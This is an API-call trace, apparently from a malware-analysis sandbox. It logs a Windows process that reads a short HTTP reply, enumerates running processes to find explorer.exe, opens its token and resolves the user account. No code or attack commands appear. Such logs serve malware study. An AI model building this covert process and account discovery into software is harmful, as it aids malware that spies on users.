	[0245.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0245.009] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e1858, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e1858*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0245.009] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0245.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1858, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0245.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e18a0
	[0245.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1858, cbMultiByte=3, lpWideCharStr=0x27e18a0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0245.010] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0245.010] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0245.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1840
	[0245.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1870
	[0245.010] lstrcpynW (in: lpString1=0x27e1870, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0245.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1828) returned 1
	[0245.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e18a0) returned 1
	[0245.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1840) returned 1
	[0245.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1858) returned 1
	[0245.010] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6ec
	[0245.015] Process32FirstW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0245.017] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0245.017] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0245.018] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0245.018] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0245.020] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0245.020] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.021] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0245.022] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0245.023] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0245.023] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0245.025] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0245.025] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0245.026] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0245.026] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0245.027] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0245.027] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0245.028] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0245.028] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.029] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0245.029] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.030] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.030] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.031] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.031] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.032] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.032] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.033] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.033] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.034] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.034] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.035] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.035] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.036] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.036] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.038] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0245.038] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.039] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.039] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.040] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0245.040] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.042] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0245.042] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.043] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.043] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.044] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0245.044] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.047] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0245.047] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.048] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0245.049] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.050] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0245.050] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.051] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0245.051] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.052] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0245.053] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.054] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0245.054] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.055] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0245.055] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.056] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0245.056] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.058] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0245.058] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.059] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0245.059] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.060] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0245.060] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.063] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0245.063] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.064] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0245.064] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.065] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0245.065] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.067] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0245.067] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.068] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0245.068] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.069] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0245.069] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0245.071] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0245.071] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0245.072] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0245.072] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.073] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0245.073] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0245.074] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0245.074] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.075] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0245.075] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0245.076] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0245.076] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.078] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.078] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.079] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.079] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.080] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.080] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.080] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.080] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.081] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0245.081] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.082] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.082] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.083] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.083] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0245.084] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0245.084] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0245.085] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0245.085] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0245.086] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0245.086] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.087] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0245.087] Process32NextW (in: hSnapshot=0x6ec, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0245.087] CloseHandle (hObject=0x6ec) returned 1
	[0245.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1858
	[0245.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1840
	[0245.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311840
	[0245.088] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x6ec
	[0245.088] OpenProcessToken (in: ProcessHandle=0x6ec, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x66c) returned 1
	[0245.088] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0245.088] GetLastError () returned 0x7a
	[0245.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5bd0
	[0245.088] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x22a5bd0, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x22a5bd0, ReturnLength=0x128c98) returned 1
	[0245.088] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a5bd8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
